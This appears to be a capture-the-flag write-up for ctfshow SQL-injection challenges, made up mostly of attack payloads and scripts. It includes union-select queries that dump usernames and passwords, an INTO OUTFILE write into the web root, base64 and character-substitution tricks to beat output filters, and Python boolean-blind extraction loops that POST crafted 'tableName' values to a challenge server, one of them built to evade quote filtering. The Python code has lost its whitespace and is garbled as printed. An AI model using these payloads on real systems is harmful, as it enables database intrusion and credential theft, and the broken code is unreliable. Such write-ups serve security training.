-1'union select 1,2,database()--+ //查询数据库名 -1'unionselect1,2,concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+ //查询指定数据库下的表名 -1'union select 1,2,concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+ //查询指定表名的列名 -1'unionselect1,2,concat(id,username,password) from ctfshow_user--+ //查询指定表名的字段
web172:
和上一题几乎一样,只是换了表名,并且这一题的回显位置只有两个。
-1'union select 1,concat(id,username,password) from ctfshow_user2--+
-1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/2.txt' --+
另解:也可以将数字替换为特殊标记
-1' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(to_base64(password),'9','numI'),'0','numJ'),'1','numA'),'2','numB'),'3','numC'),'4','numD'),'5','numE'),'6','numF'),'7','numG'),'8','numH') from ctfshow_user4--+
# Boolean-based blind extraction loop, one character position per outer iteration.
# Oracle: the literal "$user_count = 1;" in the response body decides true/false.
# Injection point is the POST field "tableName"; the request is sent once per
# candidate character (len(flagstr) requests per position, worst case).
# NOTE(review): this excerpt lost its line breaks and spaces during extraction
# ("inrange" = "in range"); it is not runnable as printed. `url`, `payload`,
# `flagstr` and `flag` are referenced but not defined in this excerpt.
# Defender's view: the server-side pattern to fix is interpolating "tableName"
# into SQL; the traffic pattern to detect is a burst of near-identical POSTs
# to one endpoint whose responses split into exactly two variants.
for i inrange(46): if i < 5: #过滤flag,从第五位开始 continue for c in flagstr: data={ "tableName":payload.format(str(i),c) } resp=requests.post(url,data) if(resp.text.find("$user_count = 1;")>0): flag+=c break print("***盲注第{}位".format(str(i))) print("flag is ctfshow{}".format(flag))
# Blind extraction variant that avoids quotes: the candidate byte is compared
# with substr(...) regexp(char(j)) for j in 0..126, one POST per candidate.
# Oracle: "$user_count = 43;" in the response body (a row-count change caused
# by the right join) marks a match. A matched "." is skipped because regexp
# treats it as a wildcard, which is why the result is printed lower-cased.
# NOTE(review): whitespace was lost during extraction ("inrange", "ifchr");
# `url` is referenced but not defined in this excerpt.
# Defender's view: same root cause as the other loops on this page (the
# "tableName" value reaches the query unparameterised); the row-count leak is
# what turns a harmless-looking count into a character oracle.
flag = 'flag{' for i inrange(45): if i <= 5: continue for j inrange(127): data = { "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))" } r = requests.post(url,data=data) if r.text.find("$user_count = 43;")>0: ifchr(j) != ".": flag += chr(j) print(flag.lower())
# Complete blind-extraction script for the "select-waf" challenge endpoint.
# convert(strs) rewrites a string as concat(char(true+true+...), ...) so no
# quote characters appear in the payload (each char code is built from
# repeated "+true"); the result is used as a regexp on the `pass` column.
# Oracle: "user_count = 1" in the response body; `s` is the candidate
# alphabet (hex digits plus "-", "{", "}") and the loop stops at "}".
# NOTE(review): whitespace was lost during extraction ("defconvert",
# "inrange", '"user_count = 1"in'); the script is not runnable as printed.
# Defender's view: quote filtering alone does not stop this — the fix is a
# parameterised query / allow-list for "tableName"; the observable signal is
# hundreds of POSTs whose "tableName" grows by one character at a time.
#author:yu22x import requests import string url="http://72195b62-090a-49f9-af4e-ee004b8545a0.challenge.ctf.show/select-waf.php" s='0123456789abcdef-{}' defconvert(strs): t='concat(' for s in strs: t+= 'char(true'+'+true'*(ord(s)-1)+'),' print(t) return t[:-1]+")" flag='' for i inrange(1,45): print(i) for j in s: d = convert(f'^ctfshow{flag+j}') data={ 'tableName':f' ctfshow_user group by pass having pass regexp({d})' } #print(data) r=requests.post(url,data=data) #print(r.text) if("user_count = 1"in r.text): flag+=j print(flag) if j=='}': exit(0) break